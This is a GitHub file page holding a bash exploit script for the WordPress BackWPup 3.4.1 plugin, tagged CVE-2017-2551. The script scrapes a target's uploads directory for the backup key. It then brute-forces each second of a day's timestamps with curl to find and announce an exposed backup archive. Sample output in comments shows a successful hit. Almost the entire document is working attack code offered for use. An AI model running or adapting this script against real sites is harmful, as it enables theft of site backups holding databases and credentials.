-
Notifications
You must be signed in to change notification settings - Fork 72
/
BackWPup_exploit.sh
executable file
·52 lines (46 loc) · 2.02 KB
/
BackWPup_exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/bin/bash
#Exploit for Wordpress Plugin BackWPup v3.4.1
#Download https://wordpress.org/plugins/backwpup
#CVE-ID: CVE-2017-2551
#[+] Getting Unique Key 57d054
#[+] Checking directory backwpup-57d054-backups
#[+] Creating Path: backwpup-57d054-backups/backwpup_57d054
#[+] Scanning website for available backups:
#http://example.com/wp-content/uploads/backwpup-57d054-backups/backwpup_57d05401_2017-09-09_11-39-51.zip 48.00%
#[+] Location http://example.com/wp-content/uploads/backwpup-57d054-backups/backwpup_57d05401_2017-09-09_11-39-52.zip Found
#[+] Received HTTP/1.1 200 OK
#Downloading......
#Add banner about vulnerability
KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
#Add error checking here
echo "[+] Getting Unique Key $KEY"
DIR="backwpup-$KEY-backups"
echo "[+] Checking directory $DIR"
WPATH="$DIR/backwpup_$KEY"
echo "[+] Creating Path: $WPATH"
#use date command here for the default date of current day
MONTH=09
DAY=09
YEAR=2017
Z=0
echo "[+] Scanning website for available backups:"
for y in `seq -w 0 23`; do
for x in `seq -w 0 59`; do
Y=`echo "scale=2;($Z/86000)*100"|bc`;
for z in `seq -w 0 59`; do
echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
Z=$(( $Z + 1 ));
CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
RESULT=`curl -s --head $CWPATH|grep 200`;
if [ -n "$RESULT" ]; then
echo ""
echo "[+] Location $CWPATH Found";
echo "[+] Received $RESULT";
echo "Downloading......";
# wget $CWPATH
exit;
fi;
done
done
done
echo "Completed."